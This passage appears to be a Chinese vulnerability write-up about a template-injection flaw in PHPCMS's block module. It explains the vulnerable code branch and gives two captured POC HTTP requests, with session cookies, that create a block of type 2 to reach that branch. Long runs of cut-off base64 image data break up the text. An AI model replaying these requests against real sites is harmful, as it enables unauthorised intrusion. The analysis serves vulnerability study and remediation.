dGpv/pvAjwDSU0OIONK7ezfM0t1LW9TLlt0rPPK3cvup6clcgKL6g7UcB3j/ZNWIA898aYaQWsXGFG+dEs7Cvv5p7rQrguw5u9rdFs9NdoL2mlZJIdAJXFwjDg6+s37Tz6+fmANozFfPW0QgghhBBCCCHEYiMBqxkIishlZZgnLfX7qB4cH4lQdHY3Y1VRBPqGAKMBK503AV5eOOwDmGxOcA4zMNjMwGAz1oDlfCEznthgjfKO0bMMjwQyvDy8J15YeeHjPXnYyF3cveh6iL8nYKW8cWDibnlKT6DX3I86m2l+OquaKc4NYWVaNLn+kYRoJt4qm3zknOropAuIi4zGX5UwONWRVsqf6OhAoI7udhliJYQQQgghhBDi2iMBq5nwy2RTRhIdlFFd0jbhT0ZjJJ6aRru5d+yY3n8rX7h+K55tb/OrQycxnw9MKG9CA/wBG85xcQc12Ea3U5EQkU2SR8XYwuueQZvINDqvmLUhmwkIxN/HA3DNkC13L7re2mcGgshODMLQ1INd01BKERCbzM5ot13W9fmxtLK3dhmr0uJ5wNcLes7xaadistXWHd0V1HRBQupq1gR9zIH+qeVPH7SeVckaqrOSip7Jzy+EEEIIIYQQQixWErCagYHmAmqyEklOe5DPantp8NajeYSRlXkfmzNicForKGro53wgwdF/htLeTWyKvJ0/27mMxr4B7MoDv+AUkoJ9cAyepKT7QuDBaT/D8ZptJKat5u6bIqlrb2NYF0xMmKKjxwZX2CWws6WCvvQ8MnMeRx/RiGU0vqVooaiwgPYFGNxoLK3l5KpVrF29np9FdVDW58DbL4jlURZKW5wkxS+S/GiKgvIWBtISCPeH6qNNtFzhfiutnsMH69h+Zya77s2h4NeFF4KZk77Jh5x7biFV76Dm4AEarvJ5aiqNB/7t21wXPMinP/sWr5bLiCwhhBBCCCGEEAufbr4zsBg5h4v58PAHnB3yIS3jHnYmhKIz5nHL8lX4DZez98gblA2PDyS0cfDwi+w7V4vVK570+PWsTMgi2ttEfe0HvJ7/Ee3jdwrUFHWlL/FuZQW9KpTEmCxi/C2cKXiDMtOVAxTW7j28efwQdWZfEuLWsSp5A6uSN7AyOZ0Q99yO2TO38R9vnub9ukEwhpGbGka8vo833i1iv2keAiyzyI+tvo0CswLVw4GKqy8w1bj7Vfa3OwjZ+BhP3pVFAFc6vz/Zd3yFP9sUgq3tE177qPWq59cFxBMbBDhqqK6+8ug8IYQQQgghhBBiodBS0zLdHhEwhoYC0NPV5e5LzS2dN0ZjIsvSbic34Cx/KjxEbXc7Zqf7RjFlrfs7bo3v48gn/8mhKU4hE3NHC0zkRw9mENNUzl++U8/AFNalMoRu5kvfeoQ1Rh2DTac4+OE7vHWsaWztK6Ugdv093H7LVlbH+WPvKeA3P3me451Xb7qe2V/kX5/ainfdm3z3X9+nb4nuRCmEEEIIIYQQYnGREVaz4bTQ01VBXb8FZW6kssO9wSoAbQFO6RMXJC2LJVFTFFW1TSlYBWDvOsLz3/8Rvz9QjSNqLTflpuMx7u8aBjLydrE6xkFV/ss884OfTylYBRAaF4OfptFdXSnBKiGEEEIIIYQQi4asYSWEq6gAtmf4gb2DA2eHmc5i6Mpcx96Xf8y
|
|||
|
|
可以知道<code>$template</code>通过<code>$_POST['template']</code>得到<br>
|
|||
|
|
这里注意一点:需要让<code>$data['type'] ==2</code>才能进入存在漏洞的代码分支,<code>$data</code>由<code>$_GET['id']</code>查询到的。</p>
|
|||
|
|
<p>那么我们漏洞利用的思路如下:</p>
|
|||
|
|
<pre><code>$data = $_GET['id'] && $data['type']==2
|
|||
|
|
$tempate =$_POST[‘template’];
|
|||
|
|
触发我们的漏洞</code></pre>
|
|||
|
|
<p>现在还差一步,就是如何让它进入我们<code>data['type'] == 2</code>的代码块分支呢<br>
|
|||
|
|
1、如果数据库存在<code>type == 2</code>,那么可以直接利用<br>
|
|||
|
|
2、如果没有<code>type == 2</code>,那我们可以通过add函数去增加一个模块<br>
|
|||
|
|
这里我们定位到相关函数<br>
|
|||
|
|
<a id=img2 href=https://xzfile.aliyuncs.com/media/upload/picture/20241012105704-a96bacf2-8845-1.png title><img src=data:image/png;base64,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
|
|||
|
|
<h1 id=toc-13>漏洞实现</h1>
|
|||
|
|
<p>去用户处抓包<br>
|
|||
|
|
<a id=img3 href=https://xzfile.aliyuncs.com/media/upload/picture/20241012105906-f1c96fe8-8845-1.png><img src=data:image/png;base64,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
|
|||
|
|
构造poc数据包</p>
|
|||
|
|
<pre><code>POST /index.php?m=block&c=block_admin&a=add&pos=1 HTTP/1.1
|
|||
|
|
Host: phpcms:8093
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
|
|||
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
|
|||
|
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
|
Content-Length: 51
|
|||
|
|
Origin: xxxxx
|
|||
|
|
Connection: close
|
|||
|
|
Referer: index.php?m=member&c=member_model&a=manage&menuid=xxx&pc_hash=xxxx
|
|||
|
|
Cookie: FWgAZ_admin_username=xxxxxx; FWgAZ_siteid=xxxxxx; FWgAZ_userid=xxxxxx; FWgAZ_admin_email=4208MzZZO8UZrGpRQA04HMiqd12wBG3TkGlX2wvnft0vRsBiMGTphiU; FWgAZ_sys_lang=6a62KVzSlqRK5SP9nprJNrOJRW_e6BvdbA8Z-zAea4sz8g; PNLpv_admin_username=31889bli0aWoQ4251eqBQbqYO1Kx6hP3PynMidkRCbRAsA; PNLpv_siteid=00c02x98xZMnq_rJLhWuNwFeovrxUvwjeCFAwPqo; PNLpv_userid=4edcYlDl8Z6VnzSErzIXMaFeZh8_-VTDbC_hV4Zc; PNLpv_admin_email=83a4_DImTsxNklYg_5oCwpZPeCghW2YJ3wB1c_INfVFNkXb3uvem; PNLpv_sys_lang=58d0qkyHmCXwObI_v8h9roWp4G4OpvfNTVFPPeMWK3qS2A; PHPSESSID=e06kab0pgurhj91umfvaef84hb
|
|||
|
|
Upgrade-Insecure-Requests: 1
|
|||
|
|
Priority: u=4
|
|||
|
|
|
|||
|
|
name=xxx2&dosubmit=xxx&type=xxx&priv=xxxx&pc_hash=xxxx</code></pre>
|
|||
|
|
<p>抓包排序处修改我们的poc数据包然后放行,这时<code>id</code>已经被创建了</p>
|
|||
|
|
<pre><code>POST /index.php?m=block&c=block_admin&a=add&pos=1 HTTP/1.1
|
|||
|
|
Host: xxxxx
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
|
|||
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
|
|||
|
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
|
Content-Length: 100
|
|||
|
|
Origin: http://phpcms:8093
|
|||
|
|
Connection: close
|
|||
|
|
Referer: http://phpcms:8093/index.php?m=member&c=member_model&a=manage&menuid=813&pc_hash=ax6aeW
|
|||
|
|
Cookie: FWgAZ_admin_username=de70NVKjF7vYb7We12NdCR5CrO-0oP9B44rY2qI0Sbxb8A; FWgAZ_siteid=e6b9FAIbe9tOBsn3d6mxIDHQxCNBlOHbgInib0yA; FWgAZ_userid=7853fTTOoZxWRx6enIcnCVgLg1DWRfUSHQGdOWO1; FWgAZ_admin_email=4208MzZZO8UZrGpRQA04HMiqd12wBG3TkGlX2wvnft0vRsBiMGTphiU; FWgAZ_sys_lang=6a62KVzSlqRK5SP9nprJNrOJRW_e6BvdbA8Z-zAea4sz8g; PNLpv_admin_username=31889bli0aWoQ4251eqBQbqYO1Kx6hP3PynMidkRCbRAsA; PNLpv_siteid=00c02x98xZMnq_rJLhWuNwFeovrxUvwjeCFAwPqo; PNLpv_userid=4edcYlDl8Z6VnzSErzIXMaFeZh8_-VTDbC_hV4Zc; PNLpv_admin_email=83a4_DImTsxNklYg_5oCwpZPeCghW2YJ3wB1c_INfVFNkXb3uvem; PNLpv_sys_lang=58d0qkyHmCXwObI_v8h9roWp4G4OpvfNTVFPPeMWK3qS2A; PHPSESSID=e06kab0pgurhj91umfvaef84hb
|
|||
|
|
Upgrade-Insecure-Requests: 1
|
|||
|
|
Priority: u=4
|
|||
|
|
|
|||
|
|
name=xxxxxx&dosubmit=xxx&type=2&priv=xxx&pc_hash=xxxx</code></pre>
|
|||
|
|
<p>可以去数据库里面看一眼,做一个验证,这里看到已经创建成功了<br>
|
|||
|
|
<a id=img4 href=https://xzfile.aliyuncs.com/media/upload/picture/20241012110501-c5592bd2-8846-1.png><img src=data:image/png;base64,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